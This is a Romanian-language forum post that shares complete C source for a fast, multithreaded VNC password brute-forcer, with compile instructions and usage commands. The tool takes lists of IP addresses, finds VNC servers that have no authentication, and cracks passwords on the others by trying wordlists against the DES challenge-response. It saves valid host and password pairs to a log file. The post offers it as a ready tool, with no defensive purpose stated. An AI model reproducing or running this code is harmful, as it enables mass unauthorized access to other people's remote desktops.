sssmoke Posted July 24, 2015 Report Posted July 24, 2015 Am vrut sa fac un brute de vncuri, fiindca din cate am vazut pe net, n-am gasit nici unul foarte rapid.Folosirea e simpla, aveti nevoie de openssl instalat si il compilati cu gcc -o vnc vnc.c -lcrypto -lpthread.#include <stdio.h>#include <string.h>#include <stdlib.h>#include <openssl/des.h>#include <sys/socket.h>#include <netinet/in.h>#include <errno.h>#include <fcntl.h>#include <netdb.h>#include <arpa/inet.h>#include <sys/mman.h>#include <signal.h>#include <sys/types.h>#include <sys/wait.h>#include <unistd.h>#include <pthread.h>#include <ctype.h>#define RED "\E[1;32;31m"#define GREEN "\E[1;32;40m"#define WHITE "\E[1;37;40m"#define NORMAL "\E[m"#define CLEARLN "\033[F\033[J"#define CONNECT_TIMEOUT 2#define READ_TIMEOUT 5#define LOCK(x) pthread_mutex_lock(&x);#define UNLOCK(x) pthread_mutex_unlock(&x);static int maxqueue = 0;static int brutemode = 0;struct host_queue{ char * host; char * pass; struct host_queue * next;};struct combi { char * host; char * pass;};static time_t start, lmin;static FILE *ipfile = NULL;static FILE *outfile = NULL;static FILE *passfile = NULL;static int finished = 0;static int done = 0;static int good = 0;static int total = 0;static long qsize = 0;static long lastmin = 0;static int dmin = 0;static struct host_queue * jobs = NULL;static pthread_mutex_t stat_lock = PTHREAD_MUTEX_INITIALIZER;static pthread_mutex_t job_lock = PTHREAD_MUTEX_INITIALIZER;static pthread_cond_t job_cond = PTHREAD_COND_INITIALIZER;static pthread_cond_t job_size_cond = PTHREAD_COND_INITIALIZER;static void usage(const char *s) { printf(RED"Usage: %s <check|brute>\n"NORMAL, s); exit(EXIT_SUCCESS);}static void usage_check(const char *s) { printf(RED"Usage: %s check <vnc list> <threads>\n"NORMAL, s); exit(EXIT_SUCCESS);}static void usage_brute(const char *s) { printf(RED"Usage: %s brute <vnc list> <passfile> <threads>\n"NORMAL, s); exit(EXIT_SUCCESS);}static void save_no_auth(const char *host) { FILE *noauth = fopen("no.auth", "a+"); fprintf(noauth, "%s\n", host); fclose(noauth);}static void save_vnc_list(const char *host) { FILE *vnclist= fopen("vnc.list", "a+"); fprintf(vnclist, "%s\n", host); fclose(vnclist);}static void queue_job(char *h, char *p) { struct host_queue * hq = (struct host_queue *) malloc(sizeof(struct host_queue)); hq->host = h; hq->pass = p; hq->next = NULL; LOCK(job_lock); while(qsize >= maxqueue) pthread_cond_wait(&job_size_cond, &job_lock); if(jobs == NULL) jobs = hq; else { hq->next = jobs; jobs = hq; } ++qsize; pthread_cond_signal(&job_cond); UNLOCK(job_lock);}static struct combi * dequeue_job(void){ struct combi * trynow = (struct combi *) malloc(sizeof(struct combi)); LOCK(job_lock); while(jobs == NULL){ LOCK(stat_lock); if(done == 1){ UNLOCK(stat_lock); UNLOCK(job_lock); free(trynow); return NULL; } UNLOCK(stat_lock); pthread_cond_wait(&job_cond, &job_lock); } trynow->host = jobs->host; trynow->pass = jobs->pass; struct host_queue * hq = jobs; jobs = jobs->next; --qsize; pthread_cond_signal(&job_size_cond); UNLOCK(job_lock); free(hq); return trynow;}static int send_msg(int sockfd, char *message) { int n; fd_set rset; struct timeval timeout; FD_ZERO(&rset); FD_SET (sockfd, &rset); timeout.tv_sec = READ_TIMEOUT; timeout.tv_usec = 0; n = select (sockfd + 1, NULL, &rset, NULL, &timeout); if (n < 0) return -1; else if (n == 0) return -1; else n = send(sockfd, message, strlen(message), MSG_NOSIGNAL); return n;}static int recv_msg(int sockfd, char **retmes) { int n; char *buffer = (char *) malloc(512); bzero(buffer, 512); *retmes = NULL; fd_set rset; struct timeval timeout; FD_ZERO(&rset); FD_SET (sockfd, &rset); timeout.tv_sec = READ_TIMEOUT; timeout.tv_usec = 0; n = select (sockfd + 1, &rset, NULL, NULL, &timeout); if(n <= 0) { free(buffer); return 0; } else n = read(sockfd, buffer, 511); *retmes = buffer; return n;}static char *Encrypt(char *Key, char *Msg, int size, char **dest) { char *Res = NULL; int n=0; DES_cblock Key2, decry, plain1, plain2, result1, result2; DES_key_schedule schedule; Res = (char *) malloc(size + 1); bzero(Res, size + 1); memcpy(Key2, Key, 8); memcpy(plain1, Msg, 8); memcpy(plain2, Msg + 8, 8); DES_set_odd_parity( &Key2 ); DES_set_key(&Key2, &schedule ); DES_ecb_encrypt(&plain1, &result1, &schedule, DES_ENCRYPT); DES_ecb_encrypt(&plain2, &result2, &schedule, DES_ENCRYPT); memcpy(Res, result1, 8); memcpy(Res + 8, result2, 8); *dest = Res; return NULL;}static int checknow(const char *host, const char *pass) { int sockfd, rc, i, n = 0, tmax = 0; long arg; unsigned char newkey[8]; bzero(newkey, 8); for (i=0;i<strlen(pass);i++) { int a = pass[i]; int b = 0; int j; for (j=0; j<8; j++) if (a & (1<<j)) b = b | (1<<7-j); unsigned char d = b; newkey[i] = d; } newkey[i] = '\0'; struct sockaddr_in remoteaddr; remoteaddr.sin_family = AF_INET; remoteaddr.sin_addr.s_addr = inet_addr(host); remoteaddr.sin_port = htons(5900);retry: sockfd = socket(AF_INET, SOCK_STREAM, 0); arg = fcntl(sockfd, F_GETFL, NULL); arg |= O_NONBLOCK; fcntl(sockfd, F_SETFL, arg); if (sockfd < 0) goto retry; struct linger so_linger; so_linger.l_onoff = 1; so_linger.l_linger = 0; struct timeval tv; int valopt; tv.tv_sec = CONNECT_TIMEOUT; tv.tv_usec = 0; if(setsockopt(sockfd, SOL_SOCKET, SO_LINGER, &so_linger, sizeof so_linger) > 0) { close(sockfd); goto retry; } if(setsockopt(sockfd, SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof(tv))) { close(sockfd); goto retry; } if(setsockopt(sockfd, SOL_SOCKET, SO_SNDTIMEO, &tv, sizeof(tv))) { close(sockfd); goto retry; } char *recbuf = NULL; if (connect(sockfd, (struct sockaddr *)&remoteaddr, sizeof(remoteaddr)) < 0) { if (errno == EINPROGRESS) { fd_set write_fds; memset(&write_fds, 0, sizeof(write_fds)); FD_ZERO(&write_fds); FD_SET(sockfd, &write_fds); if (select(sockfd+1, NULL, &write_fds, NULL, &tv) > 0) { socklen_t lon; lon = sizeof(int); getsockopt(sockfd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon); if (valopt) goto first; } else goto first; } else goto first; } n = recv_msg(sockfd, &recbuf); if(n == 0 || !strstr(recbuf, "RFB 00") || n > 12) goto first; char *proto = malloc(13 * sizeof(char)); bzero(proto, 13); if((recbuf[6] == '3' && recbuf[10] == '8') || (recbuf[6] == '4' && recbuf[10] == '1')) sprintf(proto, "RFB 003.008\n"); else if(recbuf[6] == '3' && recbuf[10] == '7') sprintf(proto, "RFB 003.007\n"); else sprintf(proto, "RFB 003.003\n"); if(send_msg(sockfd, proto) < 0) { free(proto); goto first; } free(recbuf); n = recv_msg(sockfd, &recbuf); if(n == 0) { free(proto); goto first; } unsigned char *response = malloc(17 * sizeof(char)); bzero(response, 17); int code; if(proto[10] == '7' || proto[10] == '8') { free(proto); int numberauth = recbuf[0], auth_supported = 0; for(i=1; i<numberauth + 1; i++) { if(recbuf[i] == 1) save_no_auth(host); else if(recbuf[i] == 2) auth_supported = 1; } if(auth_supported == 0) { free(response); goto first; } if(brutemode == 1) { LOCK(stat_lock); good++; UNLOCK(stat_lock); long lpassed = time(0) - lmin; if(lpassed == 60) { LOCK(stat_lock); lastmin = dmin / lpassed; dmin=0; lmin=time(0); UNLOCK(stat_lock); } long passed = time(0) - start; printf(CLEARLN"[ "WHITE"done: "GREEN"%d/%d"NORMAL" * "WHITE"speed: "GREEN"%lu tries/sec "NORMAL"* "WHITE"time: "GREEN"%lu sec"NORMAL" ]\n", good, finished, lastmin, passed); LOCK(stat_lock); save_vnc_list(host); UNLOCK(stat_lock); tmax = 3; free(response); goto first; } char authchar[1]; authchar[0] = '\x02'; if(send_msg(sockfd, authchar) < 0) { free(response); goto first; } free(recbuf); n = recv_msg(sockfd, &recbuf); if(n != 16) { free(response); goto first; } memcpy(response, recbuf, 16); } else { free(proto); code = recbuf[3]; if(code == 1) { save_no_auth(host); free(response); goto first; } else if(code == 2 && n >= 20) { if(brutemode == 1) { LOCK(stat_lock); good++; UNLOCK(stat_lock); long lpassed = time(0) - lmin; if(lpassed == 60) { LOCK(stat_lock); lastmin = dmin / lpassed; dmin=0; lmin=time(0); UNLOCK(stat_lock); } long passed = time(0) - start; printf(CLEARLN"[ "WHITE"done: "GREEN"%d/%d"NORMAL" * "WHITE"speed: "GREEN"%lu tries/sec "NORMAL"* "WHITE"time: "GREEN"%lu sec"NORMAL" ]\n", good, finished, lastmin, passed); LOCK(stat_lock); save_vnc_list(host); UNLOCK(stat_lock); free(response); tmax = 3; goto first; } memcpy(response, recbuf + n - 16, 16); } else { free(response); goto first; } } char *encrypted = NULL; Encrypt(newkey, response, 16, &encrypted); free(response); free(recbuf); if(send_msg(sockfd, encrypted) < 0) { free(encrypted); goto first; } free(encrypted); n = recv_msg(sockfd, &recbuf); if(n != 4) goto first; code = recbuf[3]; long lpassed = time(0) - lmin; if(lpassed == 60) { LOCK(stat_lock); lastmin = dmin / lpassed; dmin=0; lmin=time(0); UNLOCK(stat_lock); } long passed = time(0) - start; printf(CLEARLN"[ "WHITE"done: "GREEN"%d/%d"NORMAL" * "WHITE"speed: "GREEN"%lu tries/sec "NORMAL"* "WHITE"time: "GREEN"%lu sec"NORMAL" ]\n", good, finished, lastmin, passed); if(code == 0) { LOCK(stat_lock); printf(CLEARLN""GREEN"[+] Valid: %s: %s\n\n"NORMAL, host, pass); FILE *logfile = fopen("vnc.good", "a+"); fprintf(logfile, "%s %s\n", host, pass); fclose(logfile); UNLOCK(stat_lock); }first: LOCK(stat_lock); dmin++; finished++; UNLOCK(stat_lock); free(recbuf); close(sockfd); return -1;}static void *worker_thread(void *worker) { while(1) { struct combi *trynow = dequeue_job(); if(trynow == NULL) break; char *host = NULL, *pass = NULL; host = trynow->host; pass = trynow->pass; if(host == NULL || pass == NULL) break; checknow(host, pass); free(trynow); free(host); if(brutemode == 2) free(pass); } pthread_exit(NULL);}int main(int argc, char **argv) { char ip[32] = {0}, pass[32] = {0}; if (argc < 2) usage(argv[0]); if ((strcmp(argv[1], "check") == 0) && (argc != 4)) usage_check(argv[0]); else if((strcmp(argv[1], "brute") == 0) && (argc != 5)) usage_brute(argv[0]); else if(strcmp(argv[1], "check") != 0 && strcmp(argv[1], "brute") != 0) usage(argv[0]); if (strcmp(argv[1], "check") == 0) brutemode = 1; else if(strcmp(argv[1], "brute") == 0) brutemode = 2; int num_threads; char *list_host = NULL, *list_pass = NULL; if (brutemode == 1) { list_host = argv[2]; num_threads = atoi(argv[3]); } else { list_host = argv[2]; list_pass = argv[3]; num_threads = atoi(argv[4]); } maxqueue = num_threads; if(brutemode == 2) printf(WHITE"[*] IP List: %s Passwords: %s Threads: %d Log: vnc.good\n\n"NORMAL, list_host, list_pass, num_threads); else printf(WHITE"[*] IP List: %s Threads: %d Log: vnc.list\n\n"NORMAL, list_host, num_threads); start = time(0); lmin = time(0); if(!(ipfile = fopen(list_host, "r"))) { printf("INVALID IP FILE: %s\n", argv[1]); exit(0); } fclose(ipfile); char **passwords; int pcount=0; if(brutemode == 2) { if(!(passfile = fopen(list_pass, "r"))) { printf("INVALID PASSWORDS FILE: %s\n", argv[3]); exit(0); } fclose(passfile); passfile = fopen(list_pass, "r"); while (1) { if(!fgets((char *)&pass, sizeof(pass), passfile)) break; if (pass[strlen (pass) - 1] == '\n') pass[strlen (pass) - 1] = '\0'; if (pass != NULL) pcount++; } fclose(passfile); passwords = malloc(pcount * sizeof(char*)); pcount = 0; passfile = fopen(list_pass, "r"); while (1) { if(!fgets((char *)&pass, sizeof(pass), passfile)) break; if (pass[strlen (pass) - 1] == '\n') pass[strlen (pass) - 1] = '\0'; if (pass != NULL) { passwords[pcount] = malloc((strlen(pass)+1)*sizeof(char)); strcpy(passwords[pcount], pass); pcount++; } } fclose(passfile); } int i; pthread_t *thread = (pthread_t *) malloc(sizeof(pthread_t)*num_threads); pthread_attr_t attrs; pthread_attr_init(&attrs); pthread_attr_setdetachstate(&attrs, PTHREAD_CREATE_DETACHED); for(i=0; i<num_threads; i++) { pthread_create(&thread[i], &attrs, worker_thread, NULL); pthread_detach(thread[i]); } if(brutemode == 1) { ipfile = fopen(list_host, "r"); while(1) { if(!fgets((char *)&ip, sizeof(ip), ipfile)) break; if (ip[strlen(ip) - 1] == '\n') ip[strlen(ip) - 1] = '\0'; if (ip != NULL) { char *host = (char *)malloc(strlen(ip) + 1); strcpy(host, ip); queue_job(host, "checkmod"); } } fclose(ipfile); } else { int pc=0; for(pc=0; pc<pcount; pc++) { printf(CLEARLN""WHITE"[+]Working now with: %s\n\n"NORMAL, passwords[pc]); ipfile = fopen(list_host, "r"); while(1) { if(!fgets((char *)&ip, sizeof(ip), ipfile)) break; if (ip[strlen(ip) - 1] == '\n') ip[strlen(ip) - 1] = '\0'; if (ip != NULL) { char *host = (char *)malloc(strlen(ip) + 1); char *pass = (char *)malloc(strlen(passwords[pc]) + 1); strcpy(host, ip); strcpy(pass, passwords[pc]); queue_job(host, pass); } } fclose(ipfile); } } done=1; for(i=0; i < num_threads; i++) pthread_cond_signal(&job_cond); pthread_mutex_destroy(&job_lock); pthread_cond_destroy(&job_cond); sleep(20); free(thread); exit(0);}Daca aveti lista de ipuri si vreti doar sa verificati care au VNC si suporta autentificare dati:./vnc check listaipuri numarthreaduriDaca doriti sa faceti bruteforce direct:./vnc brute listaipuri listaparole numarthreaduriDaca gasiti vreun bug sau aveti sugestii de imbunatatire lasati mesaj 1 Quote
